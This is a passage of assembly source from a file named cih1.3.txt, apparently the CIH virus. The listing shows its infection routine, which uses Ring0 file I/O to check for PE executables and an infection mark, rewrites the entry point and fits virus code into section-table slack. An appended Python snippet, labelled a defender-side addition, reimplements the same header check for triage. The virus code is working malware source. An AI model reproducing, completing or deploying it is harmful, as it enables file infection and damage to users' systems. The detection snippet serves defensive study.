
📄 cih1.3.txt

📁 1. Create the Virus Program. * * 2. The Virus Modifies IDT to Get Ring0 Privilege.
📖 Page 1 of 5
; ***************************                                                    
                                                                                 
                        dec     edx                                              
                                                                                 
                        mov     eax, ebp                                         
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO            
                                                                                 
; ***************************                                                    
; * Is PE !?                *                                                    
; ***************************                                                    
; * Is the File             *                                                    
; * Already Infected !?     *                                                    
; ***************************                                                    
                                                                                 
                        ; cmp [esi], '\0PE\0'                                    
                        cmp     dword ptr [esi], 00455000h                       
                        jne     CloseFile                                        
                                                                                 
; *************************************                                          
; * The File is                   ^o^ *                                          
; * PE(Portable Executable) indeed.   *                                          
; *************************************                                          
; * The File isn't also Infected.     *                                          
; *************************************                                          
                                                                                 
; *************************************                                          
; * Start to Infect the File          *                                          
; *************************************                                          
; * Registers Use Status Now :        *                                          
; *                                   *                                          
; * EAX = 04h                         *                                          
; * EBX = File Handle                 *                                          
; * ECX = 04h                         *                                          
; * EDX = File Pointer to the Byte    *
; *       Preceding the 'PE\0\0'      *
; *       Signature.                  *
; * ESI = DataBuffer Address ==> @8   *                                          
; * EDI = IFSMgr_Ring0_FileIO Address *                                          
; * EBP = D600h ==> Read Data in File *                                          
; *************************************                                          
; * Stack Dump :                      *                                          
; *                                   *                                          
; * ESP => -------------------------  *                                          
; *        |       EFLAG(CF=0)     |  *                                          
; *        -------------------------  *                                          
; *        | FileNameBufferPointer |  *                                          
; *        -------------------------  *                                          
; *        |          EDI          |  *                                          
; *        -------------------------  *                                          
; *        |          ESI          |  *                                          
; *        -------------------------  *                                          
; *        |          EBP          |  *                                          
; *        -------------------------  *                                          
; *        |          ESP          |  *                                          
; *        -------------------------  *                                          
; *        |          EBX          |  *                                          
; *        -------------------------  *                                          
; *        |          EDX          |  *                                          
; *        -------------------------  *                                          
; *        |          ECX          |  *                                          
; *        -------------------------  *                                          
; *        |          EAX          |  *                                          
; *        -------------------------  *                                          
; *        |     Return Address    |  *                                          
; *        -------------------------  *                                          
; *************************************                                          
                                                                                 
                        push    ebx     ; Save File Handle                       
                                                                                 
                        push    00h     ; Set VirusCodeSectionTableEndMark       
                                                                                 
; ***************************                                                    
; * Let's Set the           *                                                    
; * Virus' Infected Mark    *                                                    
; ***************************                                                    
                                                                                 
                        push    01h     ; Size                                   
                        push    edx     ; Pointer of File                        
                        push    edi     ; Address of Buffer                      
                                                                                 
; ***************************                                                    
; * Save ESP Register       *                                                    
; ***************************                                                    
                                                                                 
                        mov     dr1, esp                                         
                                                                                 
; ***************************                                                    
; * Let's Set the           *                                                    
; * NewAddressOfEntryPoint  *                                                    
; * ( Only First Set Size ) *                                                    
; ***************************                                                    
                                                                                 
                        push    eax     ; Size                                   
                                                                                 
; ***************************                                                    
; * Let's Read              *                                                    
; * Image Header in File    *                                                    
; ***************************                                                    
                                                                                 
                        mov     eax, ebp                                         
                        mov     cl, SizeOfImageHeaderToRead                      
                        add     edx, 07h ; Move EDX to NumberOfSections          
                        call    edi      ; VXDCall IFSMgr_Ring0_FileIO           
                                                                                 
; ***************************                                                    
; * Let's Set the           *                                                    
; * NewAddressOfEntryPoint  *                                                    
; * ( Set Pointer of File,  *                                                    
; *   Address of Buffer   ) *                                                    
; ***************************                                                    
                                                                                 
                        lea     eax, (AddressOfEntryPoint-@8)[edx]               
                        push    eax     ; Pointer of File                        
                                                                                 
                        lea     eax, (NewAddressOfEntryPoint-@8)[esi]            
                        push    eax     ; Address of Buffer                      
                                                                                 
; ***************************                                                    
; * Move EDX to the Start   *                                                    
; * of SectionTable in File *                                                    
; ***************************                                                    
                                                                                 
                        movzx   eax, word ptr (SizeOfOptionalHeader-@8)[esi]     
                        lea     edx, [eax+edx+12h]                               
                                                                                 
; ***************************                                                    
; * Let's Get               *                                                    
; * Total Size of Sections  *                                                    
; ***************************                                                    
                                                                                 
                        mov     al, SizeOfScetionTable                           
                                                                                 
                        ; I Assume NumberOfSections <= 0ffh                      
                        mov     cl, (NumberOfSections-@8)[esi]                   
                                                                                 
                        mul     cl                                               
                                                                                 
; ***************************                                                    
; * Let's Set Section Table *                                                    
; ***************************                                                    
                                                                                 
                        ; Move ESI to the Start of SectionTable                  
                        lea     esi, (StartOfSectionTable-@8)[esi]               
                                                                                 
                        push    eax     ; Size                                   
                        push    edx     ; Pointer of File                        
                        push    esi     ; Address of Buffer                      
                                                                                 
; ***************************
; * The Code Size of Merge  *
; * Virus Code Section and  *
; * Total Size of Virus     *
; * Code Section Table Must *
; * be Smaller than or      *
; * Equal to the Unused     *
; * Space Size Following    *
; * the Section Table       *
; ***************************
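
A defender-side reading of the header test and section-table arithmetic in the listing above, as an added Python example that is not part of cih1.3.txt. It applies the same `00455000h` comparison to a file image and reports the byte before the signature plus the unused header space after the section table; the function names, the result keys, the sample buffer and the use of `SizeOfHeaders` are assumptions of this example. A non-zero byte before the signature is only a triage hint, not proof of infection.

```python
import struct

SECTION_ENTRY_SIZE = 0x28  # size of one IMAGE_SECTION_HEADER

def inspect_pe_header(data: bytes) -> dict:
    """Apply the listing's header test and map the space after the section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"status": "not_pe"}
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Need one byte before the signature and the header fields read below.
    if e_lfanew < 1 or e_lfanew + 88 > len(data):
        return {"status": "not_pe"}
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"status": "not_pe"}
    # Same comparison as `cmp dword ptr [esi], 00455000h`: the dword that
    # starts one byte before the signature must be 00 'P' 'E' 00.
    (probe,) = struct.unpack_from("<I", data, e_lfanew - 1)
    status = "unmarked" if probe == 0x00455000 else "marked"
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    (size_of_headers,) = struct.unpack_from("<I", data, e_lfanew + 84)
    # Same arithmetic as `lea edx, [eax+edx+12h]` with EDX at NumberOfSections.
    table_off = (e_lfanew + 6) + opt_size + 0x12
    table_end = table_off + SECTION_ENTRY_SIZE * num_sections
    return {
        "status": status,
        "mark_byte": data[e_lfanew - 1],
        "section_table_offset": table_off,
        "header_slack": size_of_headers - table_end,  # bytes left in the headers
    }

def build_sample(mark: int) -> bytes:
    """Constructed 1 KiB header image; every value here is made up for the demo."""
    buf = bytearray(0x400)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)        # e_lfanew
    buf[0x7F] = mark                               # byte before the signature
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x86, 3)           # NumberOfSections
    struct.pack_into("<H", buf, 0x94, 0xE0)        # SizeOfOptionalHeader
    struct.pack_into("<I", buf, 0x80 + 84, 0x400)  # SizeOfHeaders
    return bytes(buf)
```
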
                                                
